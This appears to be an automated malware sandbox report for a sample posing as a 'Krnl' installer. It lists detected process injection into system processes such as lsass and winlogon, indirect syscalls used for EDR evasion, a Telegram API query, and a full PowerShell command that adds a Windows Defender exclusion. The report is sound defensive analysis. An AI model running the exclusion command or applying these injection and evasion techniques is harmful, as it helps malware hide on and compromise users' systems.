                              Source: C:\Windows\System32\svchost.exeDomain query: api.telegram.org
                              .NET source code contains process injector
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                              Source: 2.0.Install.exe.7c40b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                              Source: 4.2.powershell.exe.1a84bcc81a8.13.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                              Source: 4.2.powershell.exe.1a854270000.16.raw.unpack, RunPE.cs.Net Code: Run contains injection code
                              .NET source code references suspicious native API functions
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                              Adds a directory exclusion to Windows Defender
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'Jump to behavior
                              Bypasses PowerShell execution policy
                              Source: C:\ProgramData\KrnlSetupSus.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                              Contains functionality to inject code into remote processes
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400024C4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,6_2_00000001400024C4
                              Creates a thread in another existing process (thread injection)
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 91722C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: BDCB2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 709A2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: B1552C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EFFC2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AFB82C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F7B2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C382C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 82772C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 1B1D2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6AD42C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3CA2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73D32C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 21B2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: B9FD2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 54D82C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 57DA2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 33B42C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 74532C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 15742C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: C8542C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 212A2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6D542C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D8952C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4332C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 8E72C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 19362C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 31802C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: DD9B2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: FA1C2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\spoolsv.exe EIP: D52C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D2562C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5192C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1A02C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1012C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E582C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC6C2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FAC2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A932C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 88F92C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 857C2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEDC2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2112C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D92C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FBEC2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C622C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59752C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB572C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F95A2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9EEE2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B2E2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC6E2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F82C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14DD2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44F72C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2ED52C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6AF2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84C22C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A0712C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DDB2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F4C92C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A50F2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ACF2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 85DA2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B62C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7CDE2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 94182C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 54372C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CFB2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C023A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5CC2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 93A2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 91082C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 983B2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DB92C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F023A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C023A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FB23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CB23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D423A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8823A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F623A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26A23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D523A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D023A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DA23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EA23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EF23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D623A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B223A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DB23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E123A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E523A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D423A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EC23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6223A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29F23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F223A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D423A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D523A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15C23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11C23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D423A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D123A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26A23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10E23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23823A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BC23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9323A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23A23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11523A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D323A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11323A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B223A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D523A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A623A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A223A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D623A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6023A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C823A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14623A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C623A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F23A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22323A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A923A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11723A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28823A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B023A0Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B7C2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3E9B2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4A962C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83282C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE002C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE2E2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D522C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CBB02C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CBB32C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FFD2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCC62C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DCD82C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C3322C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14ED2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F6452C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 973D2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4CC2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5512C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39652C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E0E2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 902C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 402C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 16DF2C8CJump to behavior
                              Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 16E22C8CJump to behavior
                              Found direct / indirect Syscall (likely to bypass EDR)
                              Source: C:\ProgramData\KrnlSetupSus.exeNtQuerySystemInformation: Indirect: 0x1C562245Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtResumeThread: Indirect: 0x1C5624DEJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtQuerySystemInformation: Indirect: 0x1C5633EBJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtEnumerateValueKey: Indirect: 0x1C562BB2Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtEnumerateKey: Indirect: 0x1C562AE6Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtEnumerateValueKey: Indirect: 0x1C562BE1Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtEnumerateKey: Indirect: 0x1C562B19Jump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtQueryDirectoryFile: Indirect: 0x1C56257BJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeNtDeviceIoControlFile: Indirect: 0x1C562E41Jump to behavior
                              Injects a PE file into a foreign processes
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1550000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22382770000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B1010000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E580000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB570000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 7F80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5AJump to behavior
